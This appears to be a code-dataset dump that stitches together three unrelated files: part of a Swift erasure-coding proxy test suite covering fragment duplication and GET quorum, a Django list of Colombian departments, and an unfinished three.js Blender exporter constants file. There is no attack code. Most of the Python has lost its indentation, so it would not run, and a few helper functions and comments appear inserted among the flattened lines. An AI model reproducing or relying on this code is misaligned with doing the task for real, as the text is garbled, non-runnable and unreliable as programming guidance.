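# ec_segment_size segment is available, and any remainder is flushed as a
# short final segment when the stream ends.
def _sketch_segment_buffering(self, chunks, segment_size):
    buf, segments = '', []
    for chunk in chunks:
        buf += chunk
        while len(buf) >= segment_size:
            segments.append(buf[:segment_size])
            buf = buf[segment_size:]
    if buf:
        segments.append(buf)  # the non-aligned last segment
    return segments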
def test_chunk_transformer_non_aligned_last_chunk(self):
last_chunk = 'a' * 128
def do_test(dup):
policy = ECStoragePolicy(0, 'ec8-2', ec_type=DEFAULT_TEST_EC_TYPE,
ec_ndata=8, ec_nparity=2,
object_ring=FakeRing(replicas=10 * dup),
ec_segment_size=1024,
ec_duplication_factor=dup)
expected = policy.pyeclib_driver.encode(last_chunk)
transform = obj.chunk_transformer(policy)
transform.send(None)
transform.send(last_chunk)
# flush out last chunk buffer
backend_chunks = transform.send('')
self.assertEqual(
len(backend_chunks), policy.ec_n_unique_fragments)
self.assertEqual(expected, backend_chunks)
do_test(1)
do_test(2)
@patch_policies([ECStoragePolicy(0, name='ec', is_default=True,
ec_type=DEFAULT_TEST_EC_TYPE, ec_ndata=10,
ec_nparity=4, ec_segment_size=4096,
ec_duplication_factor=2),
StoragePolicy(1, name='unu')],
fake_ring_args=[{'replicas': 28}, {}])
class TestECDuplicationObjController(
ECObjectControllerMixin, unittest.TestCase):
container_info = {
'status': 200,
'read_acl': None,
'write_acl': None,
'sync_key': None,
'versions': None,
'storage_policy': '0',
}
controller_cls = obj.ECObjectController
def _test_GET_with_duplication_factor(self, node_frags, obj):
# a basic GET test while all backends are healthy
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# the backend requests should be >= num_data_fragments
self.assertGreaterEqual(len(log), self.policy.ec_ndata)
# but <= # of replicas
self.assertLessEqual(len(log), self.replicas())
self.assertEqual(len(collected_responses), 1)
etag, frags = collected_responses.items()[0]
# the backend requests will stop at enough ec_ndata responses
self.assertEqual(
len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (len(frags), etag))
# TODO: in the following tests "frag" in node_frags actually means
# "node_index"; reconsider the naming and semantics, or simply map it
# so that the frag_index is correct.
def test_GET_with_duplication_factor(self):
obj = self._make_ec_object_stub()
node_frags = [
{'obj': obj, 'frag': 0},
{'obj': obj, 'frag': 1},
{'obj': obj, 'frag': 2},
{'obj': obj, 'frag': 3},
{'obj': obj, 'frag': 4},
{'obj': obj, 'frag': 5},
{'obj': obj, 'frag': 6},
{'obj': obj, 'frag': 7},
{'obj': obj, 'frag': 8},
{'obj': obj, 'frag': 9},
{'obj': obj, 'frag': 10},
{'obj': obj, 'frag': 11},
{'obj': obj, 'frag': 12},
{'obj': obj, 'frag': 13},
] * 2 # duplicated!
self._test_GET_with_duplication_factor(node_frags, obj)
def test_GET_with_duplication_factor_almost_duplicate_dispersion(self):
obj = self._make_ec_object_stub()
node_frags = [
# first half of # of replicas are 0, 1, 2, 3, 4, 5, 6
{'obj': obj, 'frag': 0},
{'obj': obj, 'frag': 0},
{'obj': obj, 'frag': 1},
{'obj': obj, 'frag': 1},
{'obj': obj, 'frag': 2},
{'obj': obj, 'frag': 2},
{'obj': obj, 'frag': 3},
{'obj': obj, 'frag': 3},
{'obj': obj, 'frag': 4},
{'obj': obj, 'frag': 4},
{'obj': obj, 'frag': 5},
{'obj': obj, 'frag': 5},
{'obj': obj, 'frag': 6},
{'obj': obj, 'frag': 6},
# second half of # of replicas are 7, 8, 9, 10, 11, 12, 13
{'obj': obj, 'frag': 7},
{'obj': obj, 'frag': 7},
{'obj': obj, 'frag': 8},
{'obj': obj, 'frag': 8},
{'obj': obj, 'frag': 9},
{'obj': obj, 'frag': 9},
{'obj': obj, 'frag': 10},
{'obj': obj, 'frag': 10},
{'obj': obj, 'frag': 11},
{'obj': obj, 'frag': 11},
{'obj': obj, 'frag': 12},
{'obj': obj, 'frag': 12},
{'obj': obj, 'frag': 13},
{'obj': obj, 'frag': 13},
]
# ...but it still works!
self._test_GET_with_duplication_factor(node_frags, obj)
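# A minimal sketch (an assumption about the duplication layout these
# stubs model): with replicas = unique_fragments * duplication_factor,
# a node's fragment index folds back onto the unique range.
def _sketch_backend_frag_index(self, node_index):
    unique = self.replicas() // self.policy.ec_duplication_factor
    return node_index % unique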
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_stop(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# obj1 and obj2 each have only 9 frags, which is not enough to decode
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
]
# ... and the rest are 404s. The search is limited by the request count
# (2 * replicas by default) rather than by max_extra_requests, because
# retries for 404 responses happen in ResumingGetter
node_frags += [[]] * (self.replicas() * 2 - len(node_frags))
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# the default node_iter will exhaust through the last handoff
self.assertEqual(len(log), self.replicas() * 2)
# we have obj1, obj2, and 404 NotFound in collected_responses
self.assertEqual(sorted([obj1['etag'], obj2['etag'], None]),
sorted(collected_responses.keys()))
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_many_missed_overwrite_will_need_handoff(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
# primaries
node_frags = [
{'obj': obj2, 'frag': 0},
{'obj': obj2, 'frag': 1},
{'obj': obj1, 'frag': 2}, # missed
{'obj': obj2, 'frag': 3},
{'obj': obj2, 'frag': 4},
{'obj': obj2, 'frag': 5},
{'obj': obj1, 'frag': 6}, # missed
{'obj': obj2, 'frag': 7},
{'obj': obj2, 'frag': 8},
{'obj': obj1, 'frag': 9}, # missed
{'obj': obj1, 'frag': 10}, # missed
{'obj': obj1, 'frag': 11}, # missed
{'obj': obj2, 'frag': 12},
{'obj': obj2, 'frag': 13},
]
node_frags = node_frags * 2 # 2 duplication
# so the primaries have indexes 0, 1, 3, 4, 5, 7, 8, 12, 13
# (9 indexes) for obj2 and then a handoff has index 6
node_frags += [
{'obj': obj2, 'frag': 6}, # handoff
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# there's not enough of the obj2 etag on the primaries, we would
# have collected responses for both etags, and would have made
# one more request to the handoff node
self.assertEqual(len(log), self.replicas() + 1)
self.assertEqual(len(collected_responses), 2)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_missing_and_mixed_frags_will_dig_deep_but_succeed(self):
obj1 = self._make_ec_object_stub(pattern='obj1',
timestamp=self.ts())
obj2 = self._make_ec_object_stub(pattern='obj2',
timestamp=self.ts())
# 28 nodes in total
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
[],
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
[],
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
[],
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
[],
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
[],
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
[],
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
[],
{'obj': obj1, 'frag': 7},
{'obj': obj2, 'frag': 7},
[],
{'obj': obj1, 'frag': 8},
{'obj': obj2, 'frag': 8},
[],
[],
]
node_frags += [[]] * 13  # plus 13 empty handoff nodes
# finally the 10th fragment for obj2 is found
node_frags += [[{'obj': obj2, 'frag': 9}]]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['etag'], obj2['etag'])
self.assertEqual(md5(resp.body).hexdigest(), obj2['etag'])
collected_responses = defaultdict(set)
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
index = conn.resp.headers['X-Object-Sysmeta-Ec-Frag-Index']
collected_responses[etag].add(index)
# we go exactly as long as we have to, finding two different
# etags and some 404's (i.e. collected_responses[None])
self.assertEqual(len(log), len(node_frags))
self.assertEqual(len(collected_responses), 3)
# ... regardless we should never need to fetch more than ec_ndata
# frags for any given etag
for etag, frags in collected_responses.items():
self.assertLessEqual(len(frags), self.policy.ec_ndata,
'collected %s frags for etag %s' % (
len(frags), etag))
def test_GET_with_mixed_frags_and_no_quorum_will_503(self):
# all nodes have a frag but no one set reaches quorum, and because
# there is no backend 404 response either, the proxy can only give
# up with a 503
stub_objects = [
self._make_ec_object_stub(pattern='obj1'),
self._make_ec_object_stub(pattern='obj2'),
self._make_ec_object_stub(pattern='obj3'),
self._make_ec_object_stub(pattern='obj4'),
self._make_ec_object_stub(pattern='obj5'),
self._make_ec_object_stub(pattern='obj6'),
self._make_ec_object_stub(pattern='obj7'),
]
etags = collections.Counter(stub['etag'] for stub in stub_objects)
self.assertEqual(len(etags), 7, etags) # sanity
# primaries and handoffs for required nodes
# this is the 10+4 * 2 case, so 56 requests (2 * replicas) are required
# before giving up. We prepared 7 different objects above, so the
# responses will carry 8 fragments for each object
required_nodes = self.replicas() * 2
# fill them out to the primary and handoff nodes
node_frags = []
for frag in range(8):
for stub_obj in stub_objects:
if len(node_frags) >= required_nodes:
# we already have enough responses
break
node_frags.append({'obj': stub_obj, 'frag': frag})
# sanity
self.assertEqual(required_nodes, len(node_frags))
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
collected_etags = set()
collected_status = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag)
collected_status.add(conn.resp.status)
self.assertEqual(required_nodes, len(log))
self.assertEqual(len(collected_etags), 7)
self.assertEqual({200}, collected_status)
def test_GET_with_no_durable_files(self):
# verify that at least one durable is necessary for a successful GET
obj1 = self._make_ec_object_stub()
node_frags = [
{'obj': obj1, 'frag': 0, 'durable': False},
{'obj': obj1, 'frag': 1, 'durable': False},
{'obj': obj1, 'frag': 2, 'durable': False},
{'obj': obj1, 'frag': 3, 'durable': False},
{'obj': obj1, 'frag': 4, 'durable': False},
{'obj': obj1, 'frag': 5, 'durable': False},
{'obj': obj1, 'frag': 6, 'durable': False},
{'obj': obj1, 'frag': 7, 'durable': False},
{'obj': obj1, 'frag': 8, 'durable': False},
{'obj': obj1, 'frag': 9, 'durable': False},
{'obj': obj1, 'frag': 10, 'durable': False}, # parity
{'obj': obj1, 'frag': 11, 'durable': False}, # parity
{'obj': obj1, 'frag': 12, 'durable': False}, # parity
{'obj': obj1, 'frag': 13, 'durable': False}, # parity
]
node_frags = node_frags * 2 # 2 duplications
node_frags += [[]] * self.replicas() # handoffs
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
# all 28 nodes tried with an optimistic get, none are durable and none
# report having a durable timestamp
self.assertEqual(self.replicas() * 2, len(log))
def test_GET_with_missing_and_mixed_frags_may_503(self):
obj1 = self._make_ec_object_stub(pattern='obj1')
obj2 = self._make_ec_object_stub(pattern='obj2')
obj3 = self._make_ec_object_stub(pattern='obj3')
obj4 = self._make_ec_object_stub(pattern='obj4')
# we get a 503 when all the handoffs return 200
node_frags = [[]] * self.replicas() # primaries have no frags
# plus, 4 different objects across 7 indexes will be 28 node responses
# here for the handoffs
node_frags = node_frags + [ # handoffs all have frags
{'obj': obj1, 'frag': 0},
{'obj': obj2, 'frag': 0},
{'obj': obj3, 'frag': 0},
{'obj': obj4, 'frag': 0},
{'obj': obj1, 'frag': 1},
{'obj': obj2, 'frag': 1},
{'obj': obj3, 'frag': 1},
{'obj': obj4, 'frag': 1},
{'obj': obj1, 'frag': 2},
{'obj': obj2, 'frag': 2},
{'obj': obj3, 'frag': 2},
{'obj': obj4, 'frag': 2},
{'obj': obj1, 'frag': 3},
{'obj': obj2, 'frag': 3},
{'obj': obj3, 'frag': 3},
{'obj': obj4, 'frag': 3},
{'obj': obj1, 'frag': 4},
{'obj': obj2, 'frag': 4},
{'obj': obj3, 'frag': 4},
{'obj': obj4, 'frag': 4},
{'obj': obj1, 'frag': 5},
{'obj': obj2, 'frag': 5},
{'obj': obj3, 'frag': 5},
{'obj': obj4, 'frag': 5},
{'obj': obj1, 'frag': 6},
{'obj': obj2, 'frag': 6},
{'obj': obj3, 'frag': 6},
{'obj': obj4, 'frag': 6},
]
fake_response = self._fake_ec_node_response(node_frags)
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
# never get a quorum so all nodes are searched
self.assertEqual(len(log), 2 * self.replicas())
collected_indexes = defaultdict(list)
for conn in log:
fi = conn.resp.headers.get('X-Object-Sysmeta-Ec-Frag-Index')
if fi is not None:
collected_indexes[fi].append(conn)
self.assertEqual(len(collected_indexes), 7)
def test_GET_with_mixed_etags_at_same_timestamp(self):
# the only difference from the parent class is the handoff stub length
ts = self.ts() # force equal timestamps for two objects
obj1 = self._make_ec_object_stub(timestamp=ts, pattern='obj1')
obj2 = self._make_ec_object_stub(timestamp=ts, pattern='obj2')
self.assertNotEqual(obj1['etag'], obj2['etag']) # sanity
node_frags = [
# 7 frags of obj2 are available and durable
{'obj': obj2, 'frag': 0, 'durable': True},
{'obj': obj2, 'frag': 1, 'durable': True},
{'obj': obj2, 'frag': 2, 'durable': True},
{'obj': obj2, 'frag': 3, 'durable': True},
{'obj': obj2, 'frag': 4, 'durable': True},
{'obj': obj2, 'frag': 5, 'durable': True},
{'obj': obj2, 'frag': 6, 'durable': True},
# 7 frags of obj1 are available and durable
{'obj': obj1, 'frag': 7, 'durable': True},
{'obj': obj1, 'frag': 8, 'durable': True},
{'obj': obj1, 'frag': 9, 'durable': True},
{'obj': obj1, 'frag': 10, 'durable': True},
{'obj': obj1, 'frag': 11, 'durable': True},
{'obj': obj1, 'frag': 12, 'durable': True},
{'obj': obj1, 'frag': 13, 'durable': True},
# handoffs
]
node_frags += [[]] * (self.replicas() * 2 - len(node_frags))
fake_response = self._fake_ec_node_response(list(node_frags))
req = swob.Request.blank('/v1/a/c/o')
with capture_http_requests(fake_response) as log:
resp = req.get_response(self.app)
# read body to provoke any EC decode errors
self.assertFalse(resp.body)
self.assertEqual(resp.status_int, 404)
self.assertEqual(len(log), self.replicas() * 2)
collected_etags = set()
for conn in log:
etag = conn.resp.headers['X-Object-Sysmeta-Ec-Etag']
collected_etags.add(etag) # will be None from handoffs
self.assertEqual({obj1['etag'], obj2['etag'], None}, collected_etags)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertEqual(log_lines,
['Problem with fragment response: ETag mismatch'] * 7)
def _test_determine_chunk_destinations_prioritize(
self, missing_two, missing_one):
# This scenario is only likely for ec_duplication_factor >= 2. If we
# have multiple failures such that the putters collection is missing
# two primary nodes for frag index 'missing_two' and missing one
# primary node for frag index 'missing_one', then we should prioritize
# finding a handoff for frag index 'missing_two'.
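# (layout sketch, assuming this class's 14 unique frag indexes with
# duplication factor 2: putter i maps to frag index i % 14 via
# get_backend_index, so frag index f has copies at putters f and f + 14,
# which is why the test pops missing_two + ec_n_unique_fragments below)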
class FakePutter(object):
def __init__(self, index):
self.node_index = index
controller = self.controller_cls(self.app, 'a', 'c', 'o')
# sanity: the caller must set missing_two less than ec_n_unique_fragments
self.assertLess(missing_two, self.policy.ec_n_unique_fragments)
# create a dummy list of putters, check no handoffs
putters = []
for index in range(self.policy.object_ring.replica_count):
putters.append(FakePutter(index))
# sanity - all putters have primary nodes
got = controller._determine_chunk_destinations(putters, self.policy)
expected = {}
for i, p in enumerate(putters):
expected[p] = self.policy.get_backend_index(i)
self.assertEqual(got, expected)
# now, for the fragment index that is missing two copies, let's make
# one putter be a handoff
handoff_putter = putters[missing_two]
handoff_putter.node_index = None
# and then pop another putter holding a copy of the same fragment index
putters.pop(missing_two + self.policy.ec_n_unique_fragments)
# also pop one copy of a different fragment to leave a single missing copy
putters.pop(missing_one)
# then determine chunk destinations: we have 26 putters here; the
# missing_two frag index is missing two copies and the missing_one frag
# index is missing one copy, so the handoff node should be assigned to
# the missing_two frag index
got = controller._determine_chunk_destinations(putters, self.policy)
# N.B. len(putters) is now len(expected) - 2 because we popped twice
self.assertEqual(len(putters), len(got))
# sanity: the handoff putter has no node index
self.assertIsNone(handoff_putter.node_index)
self.assertEqual(got[handoff_putter], missing_two)
# sanity: all putters except handoff_putter have a node_index
self.assertTrue(all(
[putter.node_index is not None for putter in got if
putter != handoff_putter]))
def test_determine_chunk_destinations_prioritize_more_missing(self):
# dropping node_index 0 and 14 (frag index 0) plus 1 (frag index 1) should work
self._test_determine_chunk_destinations_prioritize(0, 1)
# dropping node_index 1 and 15 (frag index 1) plus 0 (frag index 0) should work, too
self._test_determine_chunk_destinations_prioritize(1, 0)
class TestNumContainerUpdates(unittest.TestCase):
def test_it(self):
test_cases = [
# (container replicas, object replicas, object quorum, expected)
(3, 17, 13, 6), # EC 12+5
(3, 9, 4, 7), # EC 3+6
(3, 14, 11, 5), # EC 10+4
(5, 14, 11, 6), # EC 10+4, 5 container replicas
(7, 14, 11, 7), # EC 10+4, 7 container replicas
(3, 19, 16, 5), # EC 15+4
(5, 19, 16, 6), # EC 15+4, 5 container replicas
(3, 28, 22, 8), # EC (10+4)x2
(5, 28, 22, 9), # EC (10+4)x2, 5 container replicas
(3, 1, 1, 3), # 1 object replica
(3, 2, 1, 3), # 2 object replicas
(3, 3, 2, 3), # 3 object replicas
(3, 4, 2, 4), # 4 object replicas
(3, 5, 3, 4), # 5 object replicas
(3, 6, 3, 5), # 6 object replicas
(3, 7, 4, 5), # 7 object replicas
]
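# reading the first row above: 3 container replicas with an EC 12+5
# object ring (17 fragments, object quorum 13) are expected to produce
# 6 container updates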
for c_replica, o_replica, o_quorum, exp in test_cases:
c_quorum = utils.quorum_size(c_replica)
got = obj.num_container_updates(c_replica, c_quorum,
o_replica, o_quorum)
self.assertEqual(
exp, got,
"Failed for c_replica=%d, o_replica=%d, o_quorum=%d" % (
c_replica, o_replica, o_quorum))
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
ProfessionalIT/professionalit-webiste | sdk/google_appengine/lib/django-1.4/django/contrib/localflavor/co/co_departments.py | 90 | 1097 | # -*- coding: utf-8 -*-
"""
A list of Colombian departments as `choices` in a
formfield.
This exists in this standalone file so that it's only
imported into memory when explicitly needed.
"""
DEPARTMENT_CHOICES = (
('AMA', u'Amazonas'),
('ANT', u'Antioquia'),
('ARA', u'Arauca'),
('ATL', u'Atlántico'),
('DC', u'Bogotá'),
('BOL', u'Bolívar'),
('BOY', u'Boyacá'),
('CAL', u'Caldas'),
('CAQ', u'Caquetá'),
('CAS', u'Casanare'),
('CAU', u'Cauca'),
('CES', u'Cesar'),
('CHO', u'Chocó'),
('COR', u'Córdoba'),
('CUN', u'Cundinamarca'),
('GUA', u'Guainía'),
('GUV', u'Guaviare'),
('HUI', u'Huila'),
('LAG', u'La Guajira'),
('MAG', u'Magdalena'),
('MET', u'Meta'),
('NAR', u'Nariño'),
('NSA', u'Norte de Santander'),
('PUT', u'Putumayo'),
('QUI', u'Quindío'),
('RIS', u'Risaralda'),
('SAP', u'San Andrés and Providencia'),
('SAN', u'Santander'),
('SUC', u'Sucre'),
('TOL', u'Tolima'),
('VAC', u'Valle del Cauca'),
('VAU', u'Vaupés'),
('VID', u'Vichada'),
)
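# Illustrative usage (a sketch, not part of this module): these pairs can
# be passed straight to a Django form field, e.g.
#
# from django import forms
# department = forms.ChoiceField(choices=DEPARTMENT_CHOICES)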
| lgpl-3.0 |
ilovezy/three.js | utils/exporters/blender/addons/io_three/constants.py | 124 | 6852 | '''
All constant data used in the package should be defined here.
'''
from collections import OrderedDict as BASE_DICT
BLENDING_TYPES = type('Blending', (), {
'NONE': 'NoBlending',
'NORMAL': 'NormalBlending',
'ADDITIVE': 'AdditiveBlending',
'SUBTRACTIVE': 'SubtractiveBlending',
'MULTIPLY': 'MultiplyBlending',
'CUSTOM': 'CustomBlending'
})
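# Note: these type(name, bases, dict) calls build lightweight enum-like
# namespaces, e.g. BLENDING_TYPES.NORMAL evaluates to the string
# 'NormalBlending'.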
NEAREST_FILTERS = type('NearestFilters', (), {
'NEAREST': 'NearestFilter',
'MIP_MAP_NEAREST': 'NearestMipMapNearestFilter',
'MIP_MAP_LINEAR': 'NearestMipMapLinearFilter'
})
LINEAR_FILTERS = type('LinearFilters', (), {
'LINEAR': 'LinearFilter',
'MIP_MAP_NEAREST': 'LinearMipMapNearestFilter',
'MIP_MAP_LINEAR': 'LinearMipMapLinearFilter'
})
MAPPING_TYPES = type('Mapping', (), {
'UV': 'UVMapping',
'CUBE_REFLECTION': 'CubeReflectionMapping',
'CUBE_REFRACTION': 'CubeRefractionMapping',
'SPHERICAL_REFLECTION': 'SphericalReflectionMapping'
})
JSON = 'json'
EXTENSION = '.%s' % JSON
INDENT = 'indent'
MATERIALS = 'materials'
SCENE = 'scene'
VERTICES = 'vertices'
FACES = 'faces'
NORMALS = 'normals'
BONES = 'bones'
UVS = 'uvs'
COLORS = 'colors'
MIX_COLORS = 'mixColors'
SCALE = 'scale'
COMPRESSION = 'compression'
MAPS = 'maps'
FRAME_STEP = 'frameStep'
FRAME_INDEX_AS_TIME = 'frameIndexAsTime'
ANIMATION = 'animations'
MORPH_TARGETS = 'morphTargets'
POSE = 'pose'
REST = 'rest'
SKIN_INDICES = 'skinIndices'
SKIN_WEIGHTS = 'skinWeights'
LOGGING = 'logging'
CAMERAS = 'cameras'
LIGHTS = 'lights'
HIERARCHY = 'hierarchy'
FACE_MATERIALS = 'faceMaterials'
SKINNING = 'skinning'
COPY_TEXTURES = 'copyTextures'
TEXTURE_FOLDER = 'textureFolder'
ENABLE_PRECISION = 'enablePrecision'
PRECISION = 'precision'
DEFAULT_PRECISION = 6
EMBED_GEOMETRY = 'embedGeometry'
EMBED_ANIMATION = 'embedAnimation'
OFF = 'off'
GLOBAL = 'global'
BUFFER_GEOMETRY = 'BufferGeometry'
GEOMETRY = 'geometry'
GEOMETRY_TYPE = 'geometryType'
CRITICAL = 'critical'
ERROR = 'error'
WARNING = 'warning'
INFO = 'info'
DEBUG = 'debug'
NONE = 'None'
MSGPACK = 'msgpack'
PACK = 'pack'
INFLUENCES_PER_VERTEX = 'influencesPerVertex'
EXPORT_OPTIONS = {
FACES: True,
VERTICES: True,
NORMALS: True,
UVS: True,
COLORS: False,
MATERIALS: False,
FACE_MATERIALS: False,
SCALE: 1,
FRAME_STEP: 1,
FRAME_INDEX_AS_TIME: False,
SCENE: False,
MIX_COLORS: False,
COMPRESSION: None,
MAPS: False,
ANIMATION: OFF,
BONES: False,
SKINNING: False,
MORPH_TARGETS: False,
CAMERAS: False,
LIGHTS: False,
HIERARCHY: False,
COPY_TEXTURES: True,
TEXTURE_FOLDER: '',
LOGGING: DEBUG,
ENABLE_PRECISION: True,
PRECISION: DEFAULT_PRECISION,
EMBED_GEOMETRY: True,
EMBED_ANIMATION: True,
GEOMETRY_TYPE: GEOMETRY,
INFLUENCES_PER_VERTEX: 2,
INDENT: True
}
FORMAT_VERSION = 4.3
VERSION = 'version'
THREE = 'io_three'
GENERATOR = 'generator'
SOURCE_FILE = 'sourceFile'
VALID_DATA_TYPES = (str, int, float, bool, list, tuple, dict)
JSON = 'json'
GZIP = 'gzip'
EXTENSIONS = {
JSON: '.json',
MSGPACK: '.pack',
GZIP: '.gz'
}
METADATA = 'metadata'
GEOMETRIES = 'geometries'
IMAGES = 'images'
TEXTURE = 'texture'
TEXTURES = 'textures'
USER_DATA = 'userData'
DATA = 'data'
TYPE = 'type'
MATERIAL = 'material'
OBJECT = 'object'
PERSPECTIVE_CAMERA = 'PerspectiveCamera'
ORTHOGRAPHIC_CAMERA = 'OrthographicCamera'
AMBIENT_LIGHT = 'AmbientLight'
DIRECTIONAL_LIGHT = 'DirectionalLight'
AREA_LIGHT = 'AreaLight'
POINT_LIGHT = 'PointLight'
SPOT_LIGHT = 'SpotLight'
HEMISPHERE_LIGHT = 'HemisphereLight'
MESH = 'Mesh'
EMPTY = 'Empty'
SPRITE = 'Sprite'
DEFAULT_METADATA = {
VERSION: FORMAT_VERSION,
TYPE: OBJECT.title(),
GENERATOR: THREE
}
UUID = 'uuid'
MATRIX = 'matrix'
POSITION = 'position'
QUATERNION = 'quaternion'
ROTATION = 'rotation'
SCALE = 'scale'
UV = 'uv'
ATTRIBUTES = 'attributes'
NORMAL = 'normal'
ITEM_SIZE = 'itemSize'
ARRAY = 'array'
FLOAT_32 = 'Float32Array'
VISIBLE = 'visible'
CAST_SHADOW = 'castShadow'
RECEIVE_SHADOW = 'receiveShadow'
QUAD = 'quad'
USER_DATA = 'userData'
MASK = {
QUAD: 0,
MATERIALS: 1,
UVS: 3,
NORMALS: 5,
COLORS: 7
}
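# These appear to be bit positions in the three.js JSON face bitmask (an
# assumption based on the names): a face's type value would OR in
# 1 << MASK[key] for each attribute present, e.g. a quad with vertex
# colors sets bits 0 and 7.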
CHILDREN = 'children'
URL = 'url'
WRAP = 'wrap'
REPEAT = 'repeat'
WRAPPING = type('Wrapping', (), {
'REPEAT': 'RepeatWrapping',
'CLAMP': 'ClampToEdgeWrapping',
'MIRROR': 'MirroredRepeatWrapping'
})
ANISOTROPY = 'anisotropy'
MAG_FILTER = 'magFilter'
MIN_FILTER = 'minFilter'
MAPPING = 'mapping'
IMAGE = 'image'
NAME = 'name'
PARENT = 'parent'
LENGTH = 'length'
FPS = 'fps'
HIERARCHY = 'hierarchy'
POS = 'pos'
ROTQ = 'rotq'
ROT = 'rot'
SCL = 'scl'
TIME = 'time'
KEYS = 'keys'
AMBIENT = 'ambient'
COLOR = 'color'
EMISSIVE = 'emissive'
SPECULAR = 'specular'
SPECULAR_COEF = 'specularCoef'
SHININESS = 'shininess'
SIDE = 'side'
OPACITY = 'opacity'
TRANSPARENT = 'transparent'
WIREFRAME = 'wireframe'
BLENDING = 'blending'
VERTEX_COLORS = 'vertexColors'
DEPTH_WRITE = 'depthWrite'
DEPTH_TEST = 'depthTest'
MAP = 'map'
SPECULAR_MAP = 'specularMap'
LIGHT_MAP = 'lightMap'
BUMP_MAP = 'bumpMap'
BUMP_SCALE = 'bumpScale'
NORMAL_MAP = 'normalMap'
NORMAL_SCALE = 'normalScale'
#@TODO ENV_MAP, REFLECTIVITY, REFRACTION_RATIO, COMBINE
MAP_DIFFUSE = 'mapDiffuse'
MAP_DIFFUSE_REPEAT = 'mapDiffuseRepeat'
MAP_DIFFUSE_WRAP = 'mapDiffuseWrap'
MAP_DIFFUSE_ANISOTROPY = 'mapDiffuseAnisotropy'
MAP_SPECULAR = 'mapSpecular'
MAP_SPECULAR_REPEAT = 'mapSpecularRepeat'
MAP_SPECULAR_WRAP = 'mapSpecularWrap'
MAP_SPECULAR_ANISOTROPY = 'mapSpecularAnisotropy'
MAP_LIGHT = 'mapLight'
MAP_LIGHT_REPEAT = 'mapLightRepeat'
MAP_LIGHT_WRAP = 'mapLightWrap'
MAP_LIGHT_ANISOTROPY = 'mapLightAnisotropy'
MAP_NORMAL = 'mapNormal'
MAP_NORMAL_FACTOR = 'mapNormalFactor'
MAP_NORMAL_REPEAT = 'mapNormalRepeat'
MAP_NORMAL_WRAP = 'mapNormalWrap'
MAP_NORMAL_ANISOTROPY = 'mapNormalAnisotropy'
MAP_BUMP = 'mapBump'
MAP_BUMP_REPEAT = 'mapBumpRepeat'
MAP_BUMP_WRAP = 'mapBumpWrap'
